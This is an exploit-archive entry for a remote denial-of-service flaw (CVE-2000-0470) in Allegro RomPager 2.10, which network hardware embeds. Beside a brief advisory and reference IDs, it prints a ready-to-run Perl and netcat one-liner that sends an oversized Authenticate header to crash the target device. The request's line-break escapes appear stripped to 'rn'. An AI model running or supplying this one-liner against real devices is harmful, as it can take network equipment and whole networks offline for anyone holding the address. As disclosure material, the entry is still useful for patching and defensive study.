[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability
# Published : 2000-06-01
# Author : netsec
# Previous Title : Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit
# Next Title : MS Windows NT Crash with an Extra Long Username DoS Exploit


Allegro's RomPager is reported prone to a remote denial of service vulnerability.

If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser. 

CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304

The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works

the one-liner:
$ perl -e 'print "GET / HTTP/1.1rnHost: '"$ip_address"'rnAuthenticate: " . 'A' x 1024 . "rnrn"' | nc "$ip_address" 80

$ ping $ip_address # doesn't work